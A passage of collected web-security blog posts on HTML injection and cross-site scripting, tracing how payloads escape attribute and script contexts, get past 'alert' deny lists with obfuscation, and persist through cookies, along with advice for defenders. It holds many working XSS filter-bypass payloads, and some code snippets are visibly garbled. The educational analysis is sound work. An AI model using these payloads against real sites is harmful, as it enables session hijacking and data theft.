Yet the browser goes into an infinite redirect loop without ever launching the alert. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the <body> element – well after several other JavaScript functions and page content. It should have been present in the <head>. It’s like the developers knew they should do something about clickjacking, heard about a top.location trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

<script type="text/javascript">
if ( != '"onmouseover=alert(9);a="') { = '"onmouseover=alert(9);a="';

The URL in your browser bar may look exactly like the URL in the inequality test. However, the location.href property contains the URL-encoded (a.k.a. percent encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new location.href. As such, the following two strings are not identical:;a=%22"onmouseover=alert(9);a="

Since the anti-framing triggers before the browser encounters the affected href, the onmouseover payload (or any other payload inserted in the tag) won’t trigger.

This isn’t a problem. Just redirect your onhack event from the href to the if statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. It makes the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the alert() and a Boolean operator to force a false outcome.

The new payload is


Which results in this:

<script type="text/javascript">
if ( != ''+alert(9)&&null=='') { = ''+alert(9)&&null=='';

Note that we could have used other operators to glue the alert() to its preceding string. Any arithmetic operator would have worked.

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:


This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with execution different contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. <script>) after the href, but the if statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page – URL encoding would have been a logical step.

A Hidden Benefit of HTML5

Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this task, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that works around validation filters and avoids being defeated by output encoding schemes. Sometimes it’s necessary to wander the dusty passages of parsing rules in search of a hidden door that opens an element to being exploited.


HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

And every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of an hidden input field. In the following example, note that the quotation mark has not been filtered or encoded."

<input type="hidden" name="sortOn" value="x"">

If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless."><script>alert(9)</script><z"

<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">

Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">

Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">

The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">

But modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, Attributes:

“There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.”

Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems; it’s to be avoided at all costs.

From the spec, Attribute name state

“When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

So, we’ll never be able to fool a browser by “casting” the input field to a different type by a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines parsing rules in HTML Living Standard section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >

HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection, but the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise”. Look for flaws in modern browsers where this trick works, (e.g. maybe a compatibility mode or not using an explicit <!doctype html> weakens the browser’s parsing algorithm). With luck, most of the problems you discover will be implementation errors to be fixed in a particular browser rather than a design change required of the spec.

HTML5 gives us a better design to help minimize parsing-based security problems. It’s up to web developers to design better sites to help maximize the security of our data.

JavaScript: A Syntax Oddity

Should you find yourself sitting in a tin can, far above the world, it’s reasonable to feel like there’s nothing you can do. Just stare out the window and remark that planet earth is blue.

Bowie Is Ticket

Should you find yourself writing a web app, with security out of this world, then it’s reasonable to feel like there’s something you forgot to do.

Here’s a web app that, at first glance, seems secure against HTML injection. However, all you have to do is tell the browser what it wants to know. Kind of like our floating Major Tom – the papers want to know whose shirts you wear.

Every countdown to an HTML injection exploit begins with a probe. Here’s a simple one:"autofocus/onfocus=alert(9);//&search-alias=something

The site responds with a classic reflection inside an <input> field. However, it foils the attack by HTML encoding the quotation mark. After several attempts, we have to admit there’s no way to escape the quoted string:

<input type="hidden" name="url" value=";autofocus/onfocus=alert(9);//&amp;search-alias=something">

Time to move on. But we’re only moving on from that particular payload. A diligent hacker pays attention to detail because, sometimes, that persistence pays off. (Regular readers might find this situation strangely familiar…)

Before we started mutating URL parameters, the link looked more like this:

One behavior that stood out for this page was the reflection of several URL parameters within a JavaScript block. In the original page, the JavaScript was minified and condensed to a single line. We’ll introduce the script block in a more readable composition that includes some indentation and line feeds in order to more clearly convey its semantics. The following script shows up further down the page; the key point to notice is the appearance of the number 412603031 from the node parameter:

(function(w,d,e,o){ var i='DAaba0'; if(w.uDA=w.ues&&w.uet&&w.uex){ues('wb',i,1);uet('bb',i)} siteJQ.available('search-js-general', function(){ SPUtils.afterEvent('spATFEvent', function(){ o=w.DA; if(!o){o=w.DA=[];e=d.createElement('script');e.src='';d.getElementsByTagName('head')[0].appendChild(e)} o.push({c:904,a:'site=redacted;pt=Search;pid=412603031',w:728,h:90,d:768,f:1,g:''}) }) }) })(window,document)

Essentially, it’s an anonymous function that takes four parameters, two of which are evidently the window and document objects since those show up in the calling arguments. If you’re having trouble conceptualizing the previous JavaScript, consider this reduced version:

(function(w,d,e,o){ var i='DAaba0'; o=w.DA;if(!o){o=w.DA=[]} o.push({c:904,a:'site=redacted;pid=XSS'}) })(window,document)

So, our goal must be to refine what gets delivered in place of the XSS characters in order to successfully execute arbitrary JavaScript.

The first step is to insert sufficient syntax to terminate the preceding tokens (e.g. function declaration, methods). This is as straightforward as counting parentheses and such. For example, the following gets us to a point where the JavaScript engine parses correctly up to the XSS.

(function(w,d,e,o){ var i='DAaba0'; o=w.DA;if(!o){o=w.DA=[]} o.push({c:904,a:'site=redacted;pid='})});XSS'}) })(window,document)

Notice in the previous example that we’ve closed the anonymous function, but there’s no need to execute it. This is the difference between (function(){})() and (function(){}) – we omitted the final () since we’re trying to avoid introducing parsing or execution errors preceding our payload.

Next, we find a payload that’s appropriate for the injection context. The reflection point is already within a JavaScript execution block. Hence, there’s no need to use a payload with <script> tags or other elements, nor do we need to rely on an intrinsic event like onfocus().

The simplest payload in this case would be alert(9). However, it appears the site might be rejecting any payload with the word “alert” in it. No problem, we’ll turn to a trivial obfuscation method:


Since we’re trying to cram several concepts into this tutorial, we’ll wrap the payload inside its own anonymous function. Incidentally, this kind of syntax has the potential to horribly confuse regular expressions with which a developer intended to match balanced parentheses.


Recall that in the original site all of the JavaScript was condensed to a single line. This makes it easy for us to clean up the remaining tokens to ensure the browser doesn’t complain about any subsequent parsing errors. Otherwise, the contents of the JavaScript block may not be executed. Therefore, we’ll try throwing in an opening comment delimiter, like this:


Oops. The payload fails. In fact, this was where one review of the vuln stopped. The payload never got so complicated as using the obfuscated alert, but it did include the trailing comment delimiter. Since the browser never executed any pop-ups, everyone gave up and called this a false positive.

Oh dear, it seems hackers can be as fallible as the developers that give us these nice vulns to chew on.

Take a look at the browser’s ever-informative error console. It tells us exactly what went wrong:

SyntaxError: Multiline comment was not closed properly

Everything following the payload falls on a single line. So, we really should have just used the single line comment delimiter:


And we’re done! (For extra points, try figuring out what the syntax might need to be if the JavaScript spanned multiple lines. Hint: This all started with an anonymous function.)

Here’s the whole payload inside the URL. Make sure to encode the plus operator as %2b – otherwise it’ll be misinterpreted as a space.'})});(function(){window['a'%2b'lert'](9)})()//&search-alias=something

And here’s the result within the script block. (WordPress’ syntax highlighting displays it accurately, which is another hint that we’ve modified the JavaScript context correctly.)


There are a few points to review in this example. Here’s a few hints for discovering and exploiting HTML injection:

  • Inspect the entire page for areas where a URL parameter name or value is reflected. Don’t stop at the first instance.
  • Use a payload appropriate for the reflection context. In this case, we could use raw JavaScript because the reflection appeared within a <script> element.
  • Write clean payloads. Terminate preceding tokens, comment out (or correctly open) following tokens. Pay attention to messages reported in the browser’s error console.
  • Don’t be foiled by sites that put “alert” on a deny list. Effective attacks don’t even need to use an alert() function. Know simple obfuscation techniques to bypass deny lists. (Obfuscation really just means an awareness of JavaScript’s objects, methods, semantics, and creativity.)
  • Use the JavaScript that’s already present. Most sites already have a library like jQuery loaded. Take advantage of $() to create new and exciting elements within the page.

And here’s a few hints for preventing it:

  • Use an encoding mechanism appropriate to the context where data from the client will be displayed. The site correctly used HTML encoding for “ characters within the value attribute of an <input> tag, but forgot about dealing with the same value when it was inserted into a JavaScript context.
  • Use string concatenation at your peril. Create helper functions that are harder to misuse.
  • When you find one instance of a programming mistake or a bad programming pattern, search the entire code base for other instances – it’s quicker than waiting for another exploit to appear.
  • Realize that a deny list with “alert” won’t get you anywhere. Have an idea of how diverse HTML injection payloads can be.

There’s nothing really odd about JavaScript syntax. It’s a flexible language with several ways of concatenating strings, casting types, and executing methods. We know developers can build sophisticated libraries with JavaScript. We know hackers can build sophisticated exploits with it.

We know Major Tom’s a junkie, strung out in Heaven’s high, hitting an all-time low. I have my own addiction, but the little green wheels following me are just so many HTML injection vulns, waiting to be discovered.

The Wrong Location for a Locale

Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encoding like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)


A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment – which doesn’t make a round trip to the web site – isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body>:

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&# 034;&gt;



And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&# 034;&gt;



And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;


" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example, we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<html xmlns="" lang="en-US">


" xml:lang="en-US">


"> <head>

And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!-- Include the Reference Page Tag script -->
<script type="text/javascript"> var v = {}; v["v_locale"] = 'en_US"&gt;


'; </script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:">%0A%0D';alert(9)//

Too bad the apostrophe character (‘) remains encoded:

<script type="text/javascript"> var v = {}; v["v_locale"] = 'en_US&# 034;&gt;

&# 039;;alert(9)//'; </script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

As expected, the’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&# 034;&gt;

&lt;script src=&# 034; 034;&gt;&lt;/script&gt;


But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by

<html xmlns="" lang="en-US">

<script src=""></script>

" xml:lang="en-US">

<script src=""></script>

"> <head>

Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload – it’s just

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A; JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
  sessionLocale="en_US\\"> <script src=\\"\\"></script> ";

Sometime between the request to and the contact page the site decided to take the locale parameter from and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale.

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert:

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And – spoiler alert – not in the following script block:

<script language="JavaScript" type="text/javascript">
//<![CDATA[<!--/\* [ads in the cloud] Variables */
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site. Just visiting them as any user might without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">
//<![CDATA[<!--/* [ads in the cloud] Variables */ s.prop17="alert(9)";
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!)."%2balert(9)%2b"

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click to Show Page Source we’re greeted with that happy hacker greeting, the friendly alert() window.

<script language="JavaScript" type="text/javascript">
//<![CDATA[<!--/* [ads in the cloud] Variables */ s.prop17=""+alert(9)+"";
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page) we narrow the persistent carrier to a cookie value. The cookie is a long string of hexadecimal digits whose length and content does not change between requests. This is a good hint that it’s some sort of UUID that points to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.

So, we have a persistent HTML injection tied to a user-tracking cookie. A diminishing factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice it we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Plugins Stand Out

A minor theme in my recent B-Sides SF presentation was the stagnancy of innovation since HTML4 was finalized in December 1999. New programming patterns emerged over that time, only to be hobbled by the outmoded spec. To help recall that era I scoured for ancient curiosities of the last millennium. (Like Geocities’ announcement of 2MB of free hosting space.) One item I came across was a Netscape advisory regarding a Java bytecode vulnerability – in March 1996.

March 1996 Java Bytecode Vulnerability

Almost twenty years later Java still plagues browsers with continuous critical patches released month after month after month, including March 2013.

Java: Write none, uninstall everywhere.

The primary complaint against browser plugins is not their legacy of security problems (the list of which is exhausting to read). Nor that Java is the only plugin to pick on. Flash has its own history of releasing nothing but critical updates. The greater issue is that even a secure plugin lives outside the browser’s Same Origin Policy (SOP).

When plugins exist outside the security and privacy controls enforced by browsers they weaken the browsing experience. It’s true that plugins aren’t completely independent of these controls, their instantiation and usage with regard to the DOM still falls under the purview of SOP. However, the ways that plugins extend a browser (such as network and file access) are rife with security and privacy pitfalls.

For one example, Flash’s Local Storage Object (LSO) was easily abused as an “evercookie” because it was unaffected by clearing browser cookies and even how browsers decided to accept cookies or not. Yes, it’s still possible to abuse HTTP and HTML to establish evercookies. Even the lauded HTML5 Local Storage API could be abused in a similar manner. It’s for reasons like these that we should be as diligent about demanding “privacy patches” as much as we demand security fixes.

Unlike Flash, an HTML5 API like Local Storage is an open standard created by groups who review and balance the usability, security, and privacy implications of features designed to improve the browsing experience. Establishing a feature like Local Storage in the HTML spec and aligning it with similar concepts like cookies and security controls like SOP (or HTML5 features like CORS, CSP, etc.) makes them a superior implementation in terms of integrating with users’ expectations and browser behavior. Instead of one vendor providing a means to extend a browser, browser vendors (the number of which is admittedly dwindling) are competing with each other to implement a uniform standard.

Sure, HTML5 brings new risks and preserves old vulnerabilities in new and interesting ways, but a large responsibility for those weaknesses lies with developers who would misuse an HTML5 feature in the same way they might have misused XHR and JSONP in the past. Maybe we’ll start finding plaintext passwords in Local Storage objects, or more sophisticated XSS exploits using Web Workers and WebSockets to scour data from a compromised browser. Security ignorance takes a long time to fix. And even experienced developers are challenged by maintaining the security of complex web applications.

HTML5 promises to obviate plugins altogether. We’ll have markup to handle video, drawing, sound, more events, and more features to create engaging games and apps. Browsers will compete on the implementation and security of these features rather than be crippled by the presence of plugins out of their control.


Getting rid of plugins makes our browsers more secure, but adopting HTML5 doesn’t imply browsers and web sites become secure. There are still vulnerabilities that we can’t fix by simple application design choices like including X-Frame-Options or adopting Content Security Policy headers.

Would you click on an unknown link – better yet, scan an inscrutable QR code – with your current browser? Would you still do it with multiple tabs open to your email, bank, and social networking accounts?

Who cares if “the network is the computer” or an application lives in the “cloud” or it’s offered via something as a service? It’s your browser that’s the door to web apps and, when it’s not secure, an open window to your data.

Condign Punishment


The article rate here slowed down in February due to my preparation for B-Sides SF and RSA 2013. I even had to give a brief presentation about Hacking Web Apps at my company’s booth. (Followed by a successful book signing. Thank you!)

In that presentation I riffed off several topics repeated throughout this site. One topic was the mass hysteria we are forced to suffer from web sites that refuse to write safe SQL statements.

Those of you who are developers may already be familiar with a SQL-related API, though some may not be aware that the acronym stands for Advanced Persistent Ignorance.

Here’s a slide I used in the presentation (slide 13 of 29). Since I didn’t have enough time to complete nine years of research I left blanks for the audience to fill in.

Advanced Persistent Ignorance

Now you can fill in the last line. Security company Bit9 admitted last week to a compromise that was led by a SQL injection exploit. Sigh. The good news was that no massive database of usernames and passwords (hashed or not) went walkabout. The bad news was that attackers were able to digitally sign malware with a stolen Bit9 code-signing certificates.

I don’t know what I’ll add as a fill-in-the-blank for 2014. Maybe an entry for NoSQL. After all, developers love to reuse an API. String concatenation in JavaScript is no better that doing the same for SQL.

If we can’t learn from PHP’s history in this millennium, perhaps we can look further back for more fundamental lessons. The Greek historian Polybius noted how Romans protected passwords (watchwords) in his work, Histories1:

To secure the passing round of the watchword for the night the following course is followed. One man is selected from the tenth maniple, which, in the case both of cavalry and infantry, is quartered at the ends of the road between the tents; this man is relieved from guard-duty and appears each day about sunset at the tent of the Tribune on duty, takes the tessera or wooden tablet on which the watchword is inscribed, and returns to his own maniple and delivers the wooden tablet and watchword in the presence of witnesses to the chief officer of the maniple next his own; he in the same way to the officer of the next, and so on, until it arrives at the first maniple stationed next the Tribunes. These men are obliged to deliver the tablet (tessera) to the Tribunes before dark.

More importantly, the Romans included a consequence for violating the security of this process:

If they are all handed in, the Tribune knows that the watchword has been delivered to all, and has passed through all the ranks back to his hands: but if any one is missing, he at once investigates the matter; for he knows by the marks on the tablets from which division of the army the tablet has not appeared; and the man who is discovered to be responsible for its non-appearance is visited with condign punishment.

We truly need a fitting penalty for SQL injection vulnerabilities; perhaps only tempered by the judicious use of salted, hashed passwords.

  1. Polybius, Histories, trans. Evelyn S. Shuckburgh (London, New York: Macmillan, 1889), Perseus Digital Library. (accessed March 5, 2013). 

Implicit HTML, Explicit Injection

When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.

It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when it encounters unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.

One of HTML5’s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies – giving us a world where sites worked well with one and only one version of Internet Explorer (or Mozilla, etc.). A great deal of blame lays at the feet of site developers who refused to consider good HTML design patterns in favor of the principle of Code Relying on Advanced Persistent Stubbornness.

Parsing Disharmony

Untidy markup is a security hazard. It makes HTML injection vulnerabilities more difficult to detect and block, especially for regex-based countermeasures.

Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on anything other than a narrowly-focused regex becomes unwieldy at best.

First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the img tag:


Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering strange parsing territory. For some sites, this will be a trip to the undiscovered country.

Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The id attribute has an unquoted value, so we separate it from the subsequent attribute with a space. The href has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we put onclick immediately after.

<a""id=a href=""onclick=alert(9)>foo</a>

User-Agents try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:


We can adjust the end tag if there’s a filter watching for </script>. Note there is a space between the last </script and </a>.

<script/<a>alert(9)</script </a>

Successful HTML injection thrives on bad mark-up to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s %0d%0a into \r\n (carriage return, line feed) when it places the payload into HTML, then the browser might execute the alert function.


Or you might be able to separate the lack of closing > character from the alert function with an intermediate HTML comment:


The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a javascript: scheme with a line feed.

<div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')"

Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.

<a href=""&amp;/onclick=alert(9)>foo</a>

HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three JavaScript schemes use an entity for the “s” character:

java&#115;cript:alert(9) java&#x73;cript:alert(9) java&#x0073;cript:alert(9)

The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.


User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.

  • Fix the vulnerability, not the exploit. It’s not uncommon for developers to denylist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
  • Test with multiple browsers. A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
  • Prefer parsing to regex patterns. Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
  • Encode characters. You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like < and > and prevent quotes from breaking attribute values.
  • Enforce rules strictly. Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.

HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, by not so myopic that they miss “improper” HTML constructs that a browser will happily render.

Know Your JavaScript (Injections)

HTML injection vulnerabilities make a great Voigt-Kampff test for proving you care about security. We need some kind of tool to deal with developers who take refuge in the excuse, “But it’s not exploitable.”

Companies like MasterCard and VISA created the PCI standard to make sure web sites care about vulns like XSS. Parts of the standard are pretty strict, to the point where a site faces fines or becomes unable to process credit cards if it fails to fix vulns quickly. This also means that every once in a while a site’s developers refuse to acknowledge a vuln is valid because they don’t see an alert() pop up.

That is unfortunate.

(1) Probe for Reflected Values

Let’s examine Exhibit One: A Means of Writing Arbitrary Mark-up into a Page. In this case, the URL parameter’s value is written into a JavaScript string variable called pageUrl. HTML injection doesn’t get much easier than this.


The code now has an extra apostrophe hanging out at the end of pageUrl:

function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'';
        if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
            var hflanguage = document.getElementById(getClientId().HfLanguage);
            hflanguage.value = '1';
    $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','')

But when the devs go to check the vuln, they show that it’s not possible to issue an alert(). For example, they update the payload with something like this:


None of the variations on the payload seem to work. They terminated the string properly. The value gets reflected. But nothing results in JavaScript execution.

(2) Break Out of One Context, Break Another

It’s too bad our developers didn’t take the time to, you know, debug the problem. After all, HTML injection attacks are a coding exercise like any other. (Although perhaps a bit more fun.)

For starters, our payload is reflected inside a JavaScript function scope. Maybe the SetLanCookie() function just isn’t being called within the page? That would explain why the alert() never runs. A reasonable step is to close the function with a curly brace and dangle a naked alert() within the script block.


The following code confirms that the site still reflects the payload. However, our browser still isn’t visited by the expected pop-up.

function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'}alert(9);var a='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','')

